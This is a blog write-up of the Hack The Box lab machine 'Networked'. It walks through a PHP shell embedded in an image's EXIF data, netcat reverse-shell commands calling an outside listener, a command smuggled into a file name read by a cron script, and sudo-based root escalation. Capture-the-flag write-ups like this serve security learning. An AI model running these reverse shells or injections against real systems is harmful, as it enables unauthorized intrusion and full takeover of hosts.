HTB: Networked write-up
I was browsing Hack The Box today, and decided to tackle a new box, the box I saw was Networked, it’s made by Guly and looks like a fairly easy box, so let’s get exploiting!
![](https://thegeekbin.com/content/images/wordpress/2019/09/image-9.png)
The machine lives on 10.10.10.146, a quick nmap scan shows port 22 and 80 are open, so we know we’re dealing with an initial foothold from the web.
![](https://thegeekbin.com/content/images/wordpress/2019/09/image-10-1024x213.png)
We can see on the initial page, there’s just some text, so let’s run dirbuster on it! After a quick scan, we see there’s a public /uploads/ directory, and /backup/ directory.
![](https://thegeekbin.com/content/images/wordpress/2019/09/image-11.png)
![](https://thegeekbin.com/content/images/wordpress/2019/09/image-12-1024x407.png)
Awesome! We’ve got a backup of the source code, let’s download and inspect the code! The source ships with index.php, lib.php, photos.php and upload.php. Now, I think we’re most interested in the upload part and the photos part. Let’s check it out.
![](https://thegeekbin.com/content/images/wordpress/2019/09/image-13.png)
After an initial review, it looks like we’re just uploading a file, renaming it by the IP address of the user, and saving it to the /var/www/html/uploads/, some common checks we do are mime-type, and file extension. Now, there’s two ways we can crack at this, the first is uploading a common PHP shell and setting the file name like: notashell.php%00.jpg, however, let’s try harder and actually encode a comment with exiftool!
I start off by downloading a photo of the CentOS logo, and then run exiftool on it. Here’s how it looks:
![](https://thegeekbin.com/content/images/wordpress/2019/09/image-14.png)
We now have an embedded shell inside the photo, let’s upload this picture!
![](https://thegeekbin.com/content/images/wordpress/2019/09/image-15.png)
We’re told to refresh the gallery, upon refresh we see the picture! Let’s go to the direct link of it.
![](https://thegeekbin.com/content/images/wordpress/2019/09/image-16-1024x265.png)
Our shell listens on ?c=$command, so let’s have it open a reverse shell to our local box. Add the argument: ?c=nc 10.10.14.128 9983 -e /bin/bash, and load the page. It will hang forever, as long as you keep the tty open.
![](https://thegeekbin.com/content/images/wordpress/2019/09/image-17.png)
We got our initial apache/www-data shell! A quick check of /home/ shows us a user, guly, and a crontab file along with a check_attack.php, this might be interesting.
![](https://thegeekbin.com/content/images/wordpress/2019/09/image-18.png)
The crontab.guly runs every 3rd minute, and the check_attack.php looks for files not named like ip.extension, so we can leverage this, it also doesn’t bother to escape the shell arguments, bingo!
![](https://thegeekbin.com/content/images/wordpress/2019/09/image-19.png)
So, we need to spawn a shell, we’ve got nc on the box, so let’s force a shell open. Go into /var/www/html/uploads/, and run: touch “; nc 10.10.$IP $PORT -c bash” to open a shell on the 3rd minute, then wait for the back connection.
![](https://thegeekbin.com/content/images/wordpress/2019/09/image-20.png)
Bingo, we have a shell, let’s spawn a proper pty session with python:
python -c 'import pty; pty.spawn("/bin/bash")'
![](https://thegeekbin.com/content/images/wordpress/2019/09/image-21.png)
Now we’ve got our full and proper shell! Let’s grab the user flag by cat /home/guly/user.txt!
![](https://thegeekbin.com/content/images/wordpress/2019/09/image-23.png)
Perfect, we’ve got the flag! Let’s head for root. After doing a few of these boxes, I’ve found that a good starter spot to check is sudo -l, so let’s run that:
![](https://thegeekbin.com/content/images/wordpress/2019/09/image-24.png)
Perfect, I got lucky this time. We have a /usr/local/sbin/changename.sh that accepts a limited scope of arbitrary input! We should be able to bypass this!
![](https://thegeekbin.com/content/images/wordpress/2019/09/image-25.png)
Now, we have two ways to attack this, the first is we can copy the /root/ directory into guly, and chown it so we can real it. The second is we can just spawn a bash shell, let’s start with the copy /root/ directory out.
![](https://thegeekbin.com/content/images/wordpress/2019/09/image-26.png)
Perfect, our escape worked! Let’s check the /home/guly/ directory!
![](https://thegeekbin.com/content/images/wordpress/2019/09/image-27.png)
We got our root flag! But, we could’ve done the same escape with the test\ bash as the input, let’s try it.
![](https://thegeekbin.com/content/images/wordpress/2019/09/image-28.png)
Hello, root! Yet another way we jumped in to get the root flag.
![](https://thegeekbin.com/content/images/wordpress/2019/09/image-29.png)
That’s all for this box, we can consider it owned.